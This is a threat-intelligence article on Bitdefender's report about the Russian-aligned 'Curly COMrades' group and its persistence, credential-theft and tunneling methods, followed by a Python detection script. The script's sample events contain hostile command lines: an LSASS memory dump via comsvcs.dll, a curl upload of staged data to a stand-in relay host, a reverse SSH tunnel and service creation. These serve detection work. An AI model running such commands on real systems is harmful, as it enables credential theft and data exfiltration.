New Threat Actor ‘Curly COMrades’ Uses NGEN Hijacking and Multi-Layer Tunnels for Persistence
Bitdefender has designated a Russian-aligned threat actor, “Curly COMrades,” as a newly observed group, citing insufficient attribution links to known actors as well as “their operational methodologies and a broader industry concern.” Activity has been traced back to mid-2024, with operations assessed to align with Russian geopolitical interests. The group has targeted governmental organizations in Georgia and an energy sector entity in Moldova. “The group's primary objective is to maintain long-term access to target networks and steal valid credentials,” reports Bitdefender, enabling both espionage and sustained operational control within victim environments. Campaign activity points to deliberate, multi-layered intrusion methods, with an emphasis on persistence, credential harvesting, and blending into legitimate network traffic with proxy and tunneling tools.
Operational activity shows a consistent focus on credential acquisition through LSASS memory dumping, Mimikatz, DCSync, “comsvcs.dll” abuse, procdump, and shadow copy retrieval of the NTDS database. Curly COMrades deploy multiple tunneling tools including Resocks, SSH, and Stunnel to maintain redundant access paths, often executing remote commands with Atexec from the Impacket toolkit. Persistence is reinforced through NGEN task hijacking. Bitdefender notes, “This task appears inactive, yet the operating system occasionally enables and executes it at unpredictable intervals (such as during system idle times or new application deployments), making it a great mechanism for restoring access covertly.” Data exfiltration is “heavily” dependent on “curl.exe,” with compromised websites leveraged as relays to mask traffic and complicate detection. These combined methods enable resilient command-and-control and covert data theft.
Technical analysis of late-2024 intrusions identified stealthy evasion efforts, including relocating “ssh.exe” to unusual paths such as “C:\ProgramData\Microsoft\UEV\Templates\Template.exe” and altering file permissions via “icacls” to support SSH traffic forwarding. Batch scripts were deployed to automate configuration changes, and netcat-like functionality was incorporated to relay communications. The group created new Windows services such as “sc create RemUtSvc” and modified registry keys with “reg import” and “reg add” commands to cement persistence. Discovery was extensive, employing native Windows binaries (“netstat,” “tasklist,” “systeminfo,” “arp,” “route,” “wmic,” “ipconfig”) alongside PowerShell Active Directory cmdlets (“Get-ADTrust,” “get-addomain,” “get-aduser”). This living-off-the-land approach reduces reliance on detectable third-party tools while enabling thorough reconnaissance of compromised environments.
The MucorAgent malware represents one of the group’s more advanced capabilities, leveraging COM hijacking to exploit NGEN tasks for stealthy persistence. This modular “.NET” tool executes AES-encrypted PowerShell payloads without spawning “powershell.exe,” avoiding common detection mechanisms. Payloads are disguised as PNG files, with results exfiltrated via “curl.exe” to attacker-controlled infrastructure. Deployment involves registry modifications to redirect CLSIDs to malicious assemblies, supported by scheduled tasks for execution. The staged architecture enables AMSI bypass, payload decryption, and secure data transfer, aligning with the group’s broader operational goals of long-term covert access and controlled data extraction.
Exfiltration methods observed are deliberately low-frequency and manual to minimize operational noise. Data staging occurs in “C:\Users\Public\Documents,” where archives created with WinRAR are uploaded through “curl.exe” to compromised intermediary servers. These staging directories are also used in conjunction with NTDS database theft and credential collection, showing the attackers’ integration of exfiltration with credential harvesting workflows. Bitdefender’s reporting indicates that Curly COMrades’ operations combine publicly available tools, open-source projects, and custom implants to maintain persistence and stealth. Their adaptable tradecraft, layered access mechanisms, and disciplined operational tempo make them a high-severity threat capable of sustained and covert activity against strategically important targets.
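As an added example (not code from Bitdefender’s report), the following Python script applies simple process-creation detection rules to constructed Sysmon-style events that mirror the behaviors described above: ssh.exe relocated under a different name, curl.exe reading from the C:\Users\Public\Documents staging directory, service creation via sc, and comsvcs.dll abuse through rundll32. The event fields, hostnames and paths in the sample data are invented for illustration.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events for illustration only; not data from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\Microsoft\UEV\Templates\Template.exe",
     "OriginalFileName": "ssh.exe",
     "CommandLine": "Template.exe -N -R 8443 ops@relay.example"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\Documents\out.rar https://relay.example/up"},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "CommandLine": r"sc create RemUtSvc binPath= C:\ProgramData\svc.exe start= auto"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Users\Public\Documents\l.dmp full"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt"},
]

STAGING_DIR = r"c:\users\public\documents"      # staging path named in the report
OPENSSH_DIR = r"c:\windows\system32\openssh"    # where the built-in ssh.exe normally lives

def evaluate(event):
    """Return the names of every detection rule the event matches (empty list if clean)."""
    image = event["Image"]
    base = ntpath.basename(image).lower()
    orig = event.get("OriginalFileName", "").lower()
    cmd_l = event.get("CommandLine", "").lower()
    hits = []
    # PE version info says ssh.exe, but it runs under another name or from an unexpected path.
    if orig == "ssh.exe" and (base != "ssh.exe" or not image.lower().startswith(OPENSSH_DIR)):
        hits.append("renamed_or_relocated_ssh")
    # curl.exe touching the public staging directory used for archived data.
    if base == "curl.exe" and STAGING_DIR in cmd_l:
        hits.append("curl_upload_from_staging_dir")
    # New service installation through sc create.
    if base == "sc.exe" and re.search(r"\bcreate\b", cmd_l):
        hits.append("service_created_with_sc")
    # comsvcs.dll MiniDump export invoked via rundll32 (LSASS memory dumping).
    if base == "rundll32.exe" and "comsvcs.dll" in cmd_l and "minidump" in cmd_l:
        hits.append("comsvcs_minidump")
    return hits

def triage(events):
    """Map each suspicious event's image path to its rule hits; clean events are omitted."""
    return {e["Image"]: h for e in events if (h := evaluate(e))}

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(rules)}")
```

Real deployments should additionally correlate the ssh rule with file-permission changes via icacls and the curl rule with preceding WinRAR archive creation, both of which the report describes.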